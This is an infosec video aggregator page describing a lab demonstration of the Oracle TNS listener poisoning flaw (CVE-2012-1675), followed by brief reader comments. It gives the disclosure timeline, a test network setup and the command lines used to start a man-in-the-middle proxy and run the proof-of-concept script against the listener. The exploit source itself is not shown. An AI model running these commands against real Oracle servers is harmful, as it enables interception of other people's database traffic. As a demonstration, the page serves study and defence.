Description: Timeline :
Vulnerability discovered by Joxean Koret in 2008
Vulberability reported to the vendor by Joxean Koret in 2008
Public release of the vulnerability in Oracle CPU by the vendor the 2012-04-17
Details and PoC of the vulnerability released by Joxean Koret the 2012-04-18
Fake patching of the vulnerability discovered by Joxean Koret the 2012-04-26
PoC provided by:
Joxean Koret
Reference(s) :
Oracle CPU of April 2012
CVE-2012-1675
Affected versions : All versions of Oracle Database
Tested with Oracle Database 10g Enterprise Edition Release 10.2.0.4.0
Description :
Usage of Joxean Koret PoC require that the database name has a length of 6 characters.
Database server characteristics :
IP : 192.168.178.150
Oracle version : 10.2.0.4.0
Database listener port : 1521
Database listener has no clients IPs restrictions
Database name : arcsig
Database username : arcsig
Database password : testtest
Database client characteristics :
IP : 192.168.178.151
SQL*Plus version : 10.2.0.4.0
tnsnames.ora file as bellow :
TARGET.DB=
(DESCRIPTION = (ADDRESS = (PROTOCOL = TCP)(HOST = 192.168.178.150)(PORT = 1521)) (CONNECT_DATA = (SERVICE_NAME= arcsig) )
)
Attacker characteristics :
IP : 192.168.178.100
Usage of PoC provided by Joxean Koret
Demonstration :
PoC validation phase
On database server :
ifconfig
On database client :
ifconfig
sqlplus -v
cat tnsnames.ora
sqlplus arcsig@TARGET.DB
HELP
QUIT
PoC exploitation phase
On attacker :
Start the MITM proxy, how will intercept the communication between the client and the database :
sudo python proxy.py -l 192.168.178.100 -p 1521 -r 192.168.178.150 -P 1521
Start the vulnerability exploitation :
python tnspoisonv1.py 192.168.178.100 1521 arcsig 192.168.178.150 1521
On the database client :
Connect with SQL*Plus
sqlplus arcsig@TARGET.DB
?
? INDEX
TOTO
QUIT
You can see that the communication are intercepted by the proxy.
More Info :- http://www.securitytube.net/video/3948
Tags: oracle , 0day , exploit , database ,
Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying.
finally Demonstration !! Also have a look at this document.
http://www.google.co.in/url?sa=t&rct=j&q=&esrc=s&source=web&cd=4&ved=0CFwQFjAD&url=http%3A%2F%2Fwww.joxeankoret.com%2Fdownload%2Ftnspoison.pdf&ei=oWi3T-yYHcmtrAfM6PjOBw&usg=AFQjCNFpUzFW2TBfKs9IpHM-vKGRCI-Jiw&sig2=U-0h6Kkays6EQSUzyVRMYA
Thanks !
Very Useful Document.
Thanks tinitee !